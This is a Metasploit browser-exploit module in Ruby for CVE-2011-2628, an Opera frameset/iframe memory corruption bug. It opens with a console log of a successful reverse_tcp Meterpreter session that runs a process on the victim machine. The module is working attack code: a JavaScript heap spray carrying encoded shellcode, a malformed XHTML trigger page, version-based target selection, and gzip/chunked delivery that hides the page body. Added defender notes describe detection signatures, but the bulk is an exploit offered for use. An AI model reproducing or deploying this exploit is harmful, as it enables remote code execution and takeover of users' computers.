  1. Running against Opera v10.62...
  2. #
  3. #
  4. # =[ metasploit v4.0.1-dev [core:4.0 api:1.0]
  5. # + -- --=[ 741 exploits - 378 auxiliary - 82 post
  6. # + -- --=[ 228 payloads - 27 encoders - 8 nops
  7. # =[ svn r13801 updated 3 days ago (2011.09.27)
  8. #
  9. # msf > use windows/browser/opera_frameset_tag
  10. # msf exploit(opera_frameset_tag) > set payload windows/meterpreter/reverse_tcp
  11. # payload => windows/meterpreter/reverse_tcp
  12. # msf exploit(opera_frameset_tag) > set LHOST 192.168.1.103
  13. # LHOST => 192.168.1.103
  14. # msf exploit(opera_frameset_tag) > exploit
  15. # [*] Exploit running as background job.
  16. #
  17. # [*] Started reverse handler on 192.168.1.103:4444
  18. # msf exploit(opera_frameset_tag) >
  19. # [*] Using URL: http://0.0.0.0:8080/sUpFmezLW6jS
  20. # [*] Local IP: http://192.168.1.103:8080/sUpFmezLW6jS
  21. # [*] Server started.
  22. # [*] Sending Opera 10/11 (bad nesting with frameset tag) Memory Corruption to 192.168.1.104:1185 (target: Opera Browser (v10.6x - v11.xx) / Windows XP SP3 (DEP-default))
  23. # [*] Sending stage 1 (Spraying the heap)
  24. # [*] Sending stage 2 (Triggering the vulnerability)
  25. # [*] Sending stage 2 (Triggering the vulnerability)
  26. # [*] Sending stage 2 (Triggering the vulnerability)
  27. # [*] Sending stage (752128 bytes) to 192.168.1.104
  28. # [*] Meterpreter session 1 opened (192.168.1.103:4444 -> 192.168.1.104:1190) at 2011-09-30 19:23:28 +0200
  29. # Interrupt: use the 'exit' command to quit
  30. # msf exploit(opera_frameset_tag) > sessions
  31. #
  32. # Active sessions
  33. # ===============
  34. #
  35. # Id Type Information Connection
  36. # -- ---- ----------- ----------
  37. # 1 meterpreter x86/win32 0XDE1-A39ED4C12\0xde1 @ 0XDE1-A39ED4C12 192.168.1.103:4444 -> 192.168.1.104:1190
  38. #
  39. # msf exploit(opera_frameset_tag) > sessions -i 1
  40. # [*] Starting interaction with 1...
  41. #
  42. # meterpreter > getuid
  43. # Server username: 0XDE1-A39ED4C12\0xde1
  44. # meterpreter > execute -f calc.exe
  45. # Process 1336 created.
  46. # meterpreter > exit
  47. # [*] Shutting down Meterpreter...
  48. # msf exploit(opera_frameset_tag) >
  49. #
  50. ################################################################################################################
  51.  
  52. require 'msf/core'
  53.  
  ##
  # Metasploit browser-exploit module for CVE-2011-2628 (Opera frameset/iframe
  # nesting memory corruption). It uses the HttpServer::HTML mixin to serve a
  # two-stage exchange: a first page that builds a heap spray in JavaScript and
  # later writes a hidden iframe, and a second `.xhtml` page that carries the
  # malformed frameset/iframe nesting.
  #
  # Defender notes, all observable in the code below:
  # - Two responses per victim: `text/html` (stage 1) followed by
  #   `application/xhtml+xml` for a URI ending in `.xhtml` (stage 2), both sent
  #   with `Pragma: no-cache`; 'DefaultOptions' also enables gzip compression
  #   and chunked transfer, which hides the page body from naive inspection.
  # - Stage 1 JavaScript is recognisable by `unescape`-built strings doubled
  #   until `length * 2` reaches just under 0x100000, an array of
  #   'SizeofSpray' such blocks, and a `document.write` of an iframe after a
  #   2-4 s `setTimeout`; identifier names are randomised per request, so
  #   structure rather than names is the useful signature.
  # - The console transcript above shows the trigger being re-served several
  #   times ("Sending stage 2" repeated), matching the reload / crash-dialog
  #   behaviour the 'Description' warns about.
  class Metasploit3 < Msf::Exploit::Remote

    Rank = NormalRanking

    include Msf::Exploit::Remote::HttpServer::HTML

    # Module metadata: name, description, references, default HTTP options,
    # payload constraints and the four targets.
    #
    # Target order matters: automatic_target selects by index (targets[1..3]),
    # so reordering the 'Targets' array changes which spray size is served.
    #
    # @param info [Hash] module info merged via update_info
    def initialize(info = {})

      super(update_info(info,
        'Name' => 'Opera 10/11 (bad nesting with frameset tag) Memory Corruption',
        'Description' => %q{

This module exploits a vulnerability in the nesting of frameset and iframe tags as implemented within
Opera Browser. A memory corruption is triggered and some pointers got corrupted with invalid addresses.
Successfully exploiting leads to remote code execution or denial of service condition under Windows XP
SP3 (DEP = off).

Note than most of cases, it won't work at first attempt and need crash-dialog interaction.
Read the last reference for further details.

},
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'Jose A. Vazquez'
          ],
        'Version' => '$Revision: 0011 $',
        'References' =>
          [
            ['CVE', '2011-2628'],
            ['OSVDB', '72406'],
            ['BID', '47906'],
            ['URL', 'http://www.opera.com/support/kb/view/992/'],
            ['URL', 'http://www.beyondsecurity.com/ssd.html'],
            ['URL', 'http://spa-s3c.blogspot.com/2011/05/spas3c-sv-004opera-browser-1111.html'],
            ['URL', 'http://spa-s3c.blogspot.com/2011/09/spas3c-sv-004reliability-tests-ssd.html']
          ],
        # gzip + chunked responses: the page body is not plain text on the wire.
        'DefaultOptions' =>
          {
            'EXITFUNC' => 'process',
            'HTTP::compression' => 'gzip',
            'HTTP::chunked' => true
          },
        'Payload' =>
          {
            'Space' => 1000,
            'BadChars' => "\x00",
            'Compat' =>
              {
                'ConnectionType' => '-find',
              },
            'StackAdjustment' => -3500
          },
        'Platform' => 'win',
        # Index 0 is resolved at request time by automatic_target; indices
        # 1-3 are referenced by number there and must stay in this order.
        'Targets' =>
          [
            # Automatic
            [ 'Automatic',
              {}
            ],

            # Opera > v10.54 ~ spray of 350 MB
            [ 'Opera Browser (v10.6x - v11.xx) / Windows XP SP3 (DEP-default)',
              {
                'SizeofSpray' => 700,
                'Ret' => 0x0c0c0c0c
              }
            ],

            # Opera <= v10.54 ~ spray of 250 MB
            [ 'Opera Browser (v10.50 - v10.54) / Windows XP SP3 (DEP-default)',
              {
                'SizeofSpray' => 500,
                'Ret' => 0x0c0c0c0c
              }
            ],

            # Opera < v10.50 doesn't get crashed with previous method and it needs this one.
            [ 'Opera Browser (v10.00 - v10.10) / Windows XP SP3 (DEP-default)',
              {
                'SizeofSpray' => 500,
                'Ret' => 0x0c0c0c0c
              }
            ]
          ],
        'DisclosureDate' => '5 October 2011',
        'DefaultTarget' => 0))

    end

    #I don't know if Msf::Exploit::Remote::BrowserAutopwn works, but I'm going to include my own auto-target selection

    # Picks a concrete target from the User-Agent header when the 'Automatic'
    # target is selected. The Opera "Version/10.xx" token is matched against
    # the three concrete targets by index: 10.00/10.01/10.10 -> targets[3],
    # 10.50-10.54 -> targets[2], anything else -> targets[1]. A missing header
    # also falls through to targets[1], since `nil =~ regex` is nil.
    #
    # @param cli [Rex::Socket] client connection (not used here)
    # @param request [Rex::Proto::Http::Request] incoming request
    # @return [Msf::Module::Target] the chosen target
    def automatic_target(cli, request)

      thistarget = nil

      agent = request.headers['User-Agent']

      # NOTE(review): `or` is used for boolean logic; it is safe here only
      # because there is no assignment in the condition.
      if agent =~ /Version\/10\.00/ or agent =~ /Version\/10\.01/ or agent =~ /Version\/10\.10/
        thistarget = targets[3]
      elsif agent =~ /Version\/10\.50/ or agent =~ /Version\/10\.51/ or agent =~ /Version\/10\.52/ or agent =~ /Version\/10\.53/ or agent =~ /Version\/10\.54/
        thistarget = targets[2]
      else
        thistarget = targets[1]
      end

      thistarget

    end

    # HttpServer callback. Serves the stage-2 trigger for URIs ending in
    # `.xhtml`, and the stage-1 spray page for any other URI, then hands the
    # connection to the payload handler.
    #
    # The trigger branch never touches the payload; the spray branch regenerates
    # the payload per request and returns silently if regeneration fails. The
    # stage-1 markup differs by target: the v10.00-v10.10 variant embeds the
    # frameset nesting and a 500 ms `location.reload()` loop in one page, while
    # newer targets get a plain HTML page that later writes an iframe pointing
    # at a random `*.xhtml` resource under this server's URL.
    #
    # @param cli [Rex::Socket] client connection
    # @param request [Rex::Proto::Http::Request] incoming request
    # @return [void]
    def on_request_uri(cli, request)

      # Resolve 'Automatic' from the User-Agent; otherwise use the chosen target.
      mytarget = target

      if target.name == 'Automatic'
        mytarget = automatic_target(cli, request)
      end

      # NOTE(review): `$` anchors at end of line rather than end of string;
      # harmless for a URI without newlines, but `\z` is the precise anchor.
      if(request.uri =~ /\.xhtml$/)

        #Send file for trigger the vulnerability for cases > v10.10

        # No shellcode in this response: only the namespaced frameset/iframe/
        # script nesting plus a meta refresh and padding CSS.
        html = %Q|
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:xht="http://www.w3.org/1999/xhtml">
<meta http-equiv="refresh" content="0;url=" />
<xht:frameset>
<xht:iframe>
<xht:script>
rbc
</xht:script>
<style type="text/css">
<!-- /* padding CSS */

approx:root{
font: 333em;
}
-->
</style>
</xht:iframe>
</xht:frameset>
</html>
|

        #Send triggerer

        print_status("Sending stage 2 (Triggering the vulnerability)")

        var_contentype = 'application/xhtml+xml'

      else

        #Send payload + hide iframe for trigger the vuln

        #Re-generate the payload

        # NOTE(review): `p` is assigned but never read; the shellcode below is
        # taken from `payload.encoded` instead.
        return if ((p = regenerate_payload(cli)) == nil)

        #Encode the shellcode

        # %u-escaped shellcode in the target's byte order, for JS `unescape`.
        shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))

        #Ret

        # Low 16 bits of 'Ret': pack little-endian, hex-encode, keep the first
        # four hex digits. Used as the `%uXXXX` filler of every spray block.
        addr_word = [mytarget.ret].pack('V').unpack('H*')[0][0,4]

        #Randomize the javascript variable names

        # Each name is 2..31 alphabetic characters (rand(30)+2).
        var_buffer = rand_text_alpha(rand(30)+2)
        var_shellcode = rand_text_alpha(rand(30)+2)
        var_unescape = rand_text_alpha(rand(30)+2)
        var_x = rand_text_alpha(rand(30)+2)
        var_i = rand_text_alpha(rand(30)+2)

        var_size = rand_text_alpha(rand(30)+2)
        var_nopsize = rand_text_alpha(rand(30)+2)
        var_limit = rand_text_alpha(rand(30)+2)

        var_function_trigger = rand_text_alpha(rand(30)+2)
        var_file_trigger = rand_text_alpha(rand(30)+2)

        # Delay before the iframe is written: 2000, 3000 or 4000 ms.
        var_timer_trigger = (rand(3) + 2) * 1000

        #Build the exploit

        # Absolute URL of this server as seen by the client: scheme from SSL,
        # host from SRVHOST (or the local address facing the peer when bound to
        # 0.0.0.0), then port and the module's resource path.
        var_url = ((datastore['SSL']) ? "https://" : "http://")
        var_url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'])
        var_url << ":" + datastore['SRVPORT']
        var_url << get_resource

        #Sending init HTML
        print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})")

        # Only the 'v10.00 - v10.10' target name contains this token (the `.`
        # is unescaped and matches any character).
        if mytarget.name =~ /v10.00/

          # Case v10.00 - v10.10

          # Single page: spray plus the frameset nesting, reloaded every 500 ms.
          # NOTE(review): the closing tag is written as `<html>` rather than
          # `</html>`; left as-is because the markup is part of the response.
          html = %Q|
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:xht="http://www.w3.org/1999/xhtml">
<xht:frameset>
<xht:iframe>
<xht:script>
aaaaaa
</xht:script>
</xht:iframe>
</xht:frameset>
<script type="text/javascript">
<![CDATA[
var #{var_unescape} = unescape;
var #{var_shellcode} = #{var_unescape}("#{shellcode}");

var #{var_size} = #{var_shellcode}.length * 2;
var #{var_nopsize} = 0x100000 - (#{var_size} + 0x14);
var #{var_buffer} = #{var_unescape}("%u#{addr_word}");

while ( #{var_buffer}.length * 2 < #{var_nopsize} ) {
#{var_buffer} += #{var_buffer};
}

var #{var_x} = new Array();

for ( var #{var_i} =0; #{var_i} < #{mytarget['SizeofSpray']}; #{var_i}++ ) {
#{var_x}[ #{var_i} ] = #{var_buffer} + #{var_shellcode};
}
setInterval("location.reload()", 500);
]]>
</script>
<html>
|

          print_status("Sending simple stage (Sprayer and Triggerer)")
          var_contentype = 'application/xhtml+xml'

        else

          # Case > v10.10

          # Spray page only; after var_timer_trigger ms it writes an iframe
          # whose src is "#{var_url}/#{var_file_trigger}.xhtml", which routes
          # back into the `.xhtml` branch above. Same `<html>` closing-tag
          # remark applies here.
          html = %Q|
<html>
<head>
<script type="text/javascript">
var #{var_unescape} = unescape;
var #{var_shellcode} = #{var_unescape}("#{shellcode}");

var #{var_size} = #{var_shellcode}.length * 2;
var #{var_nopsize} = 0x100000 - (#{var_size} + 0x14);
var #{var_buffer} = #{var_unescape}("%u#{addr_word}");

while ( #{var_buffer}.length * 2 < #{var_nopsize} ) {
#{var_buffer} += #{var_buffer};
}

var #{var_x} = new Array();

for ( var #{var_i} =0; #{var_i} < #{mytarget['SizeofSpray']}; #{var_i}++ ) {
#{var_x}[ #{var_i} ] = #{var_buffer} + #{var_shellcode};
}

function #{var_function_trigger}(){
document.write("<iframe src='#{var_url}/#{var_file_trigger}.xhtml'></iframe>");
}

setTimeout('#{var_function_trigger}()',#{var_timer_trigger});

</script>
</head>
<html>
|

          print_status("Sending stage 1 (Spraying the heap)")
          var_contentype = 'text/html'

        end

      end

      #Response
      # Content-Type is 'text/html' or 'application/xhtml+xml' depending on the
      # branch taken; Pragma: no-cache is set on every response.
      send_response(cli, html, { 'Content-Type' => var_contentype, 'Pragma' => 'no-cache' })
      #Handle the payload
      handler(cli)

    end

  end
  337.  
  338.  
  339. # [2011-10-06]
  340.  